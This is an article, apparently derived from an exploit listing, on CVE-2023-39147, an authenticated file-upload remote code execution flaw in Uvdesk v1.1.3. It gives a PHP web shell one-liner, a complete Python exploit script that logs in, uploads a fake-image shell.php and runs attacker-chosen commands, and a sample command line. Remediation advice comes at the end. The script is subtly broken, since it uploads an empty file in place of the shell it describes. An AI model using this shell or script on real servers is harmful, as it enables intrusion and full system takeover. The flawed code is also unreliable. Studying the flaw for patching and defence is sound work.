Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)

Uvdesk v1.1.3 – File Upload Remote Code Execution (RCE) Vulnerability (CVE-2023-39147)

Uvdesk, a popular open-source helpdesk and knowledge management platform, has recently come under scrutiny due to a critical security flaw identified in version v1.1.3. This vulnerability, designated as CVE-2023-39147, allows authenticated attackers to achieve remote code execution (RCE) via a seemingly innocuous file upload feature. The exploit leverages misconfigured file handling and insufficient input validation, turning a standard user upload into a full system compromise.

Overview of the Vulnerability

The core issue lies in the knowledgebase file upload functionality within Uvdesk's admin interface. Specifically, when an authenticated user uploads a file labeled as an image (e.g., image/jpg), the system does not properly sanitize the file content. Instead, it stores the file directly on the server without verifying its actual type or content.

Attackers exploit this by uploading a PHP script disguised as an image. The server treats the file as a valid image, but since PHP files are not blocked by default, the script is executed when accessed via a direct URL. This bypasses traditional security checks and enables arbitrary command execution through the $_GET['cmd'] parameter.

Exploit Mechanism: Step-by-Step Breakdown

Here’s how the attack unfolds:

• Authentication: The attacker must first log in using valid credentials (e.g., admin@adm.com with a known password).
• File Upload: The attacker uploads a file named shell.php with content <?php system($_GET['cmd']); ?>, while setting the MIME type to image/jpg.
• Execution: Once uploaded, the file is accessible at http://target.com/assets/knowledgebase/shell.php?cmd=whoami. The server executes the PHP code, running the specified command.

Real-World Exploit Code Example

import requests
import argparse

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
    my_args = parser.parse_args()
    return my_args

def main():
    args = get_args()
    base_url = args.url

    command = args.command
    uploaded_file = "shell.php"
    url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command

    # Edit your credentials here
    login_data = {
        "_username": "admin@adm.com",
        "_password": "passwd",
        "_remember_me": "off"
    }

    files = {
        "name": (None, "pwn"),
        "description": (None, "xxt"),
        "visibility": (None, "public"),
        "solutionImage": (uploaded_file, "", "image/jpg")
    }

    s = requests.session()
    # Login
    s.post(base_url + "/en/member/login", data=login_data)
    # Upload
    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)
    # Execute command
    cmd = s.get(url_cmd)
    print(cmd.text)

if __name__ == "__main__":
    main()

Explanation: This Python script automates the exploitation process. It performs:

• Authentication using predefined credentials.
• Uploading a malicious PHP file by manipulating the solutionImage field.
• Executing arbitrary commands via the cmd query parameter.

For instance, running python3 CVE-2023-39147.py -u "http://192.168.1.100:8000/" -c "whoami" will return the current user identity, confirming successful execution.

Security Implications and Risk Assessment

Severity	Critical (CVSS: 9.8)
Attack Vector	Network (Authenticated)
Impact	Remote Code Execution, Full System Compromise
Exploitability	High – requires only login credentials and a simple script

Because this vulnerability requires authentication, it is not exploitable by anonymous users. However, in environments where default credentials are used or where admin accounts are compromised, the risk escalates significantly. Once RCE is achieved, attackers can:

• Install backdoors.
• Extract sensitive data (e.g., database credentials).
• Gain root access via privilege escalation.
• Deploy malware or pivot to internal networks.

Why This Vulnerability Occurred

Uvdesk v1.1.3 suffers from a classic file upload misconfiguration. The system:

• Accepts file uploads without validating file extensions.
• Relies on MIME type (e.g., image/jpg) for security, which is easily spoofed.
• Stores files in a publicly accessible directory without access controls.

These flaws highlight a critical gap in defense-in-depth principles. Even if a file is labeled as an image, its content should be inspected, and execution should be blocked for non-static files.

Remediation and Best Practices

For administrators and developers, the following measures are essential:

• Disable file execution in upload directories: Ensure that .php files are not executable in /assets/knowledgebase.
• Implement file type validation: Use server-side checks to verify file content, not just MIME type.
• Restrict upload paths: Store uploaded files in non-public directories and use secure access mechanisms.
• Use a file scanning tool: Integrate antivirus or malware detection for uploaded content.
• Apply strict access controls: Ensure only authorized users can access uploaded files.

Additional Notes

While this exploit is specific to v1.1.3, similar vulnerabilities exist in other open-source helpdesk platforms. This underscores the importance of:

• Regularly updating software.
• Conducting security audits.
• Monitoring for known CVEs.

For users of Uvdesk, it is strongly recommended to upgrade to the latest stable version, which includes fixes for this and other security issues. The vendor, uvdesk.com, has acknowledged the flaw and released patches in subsequent versions.

As cyber threats evolve, understanding and mitigating vulnerabilities like CVE-2023-39147 is vital for maintaining secure infrastructure.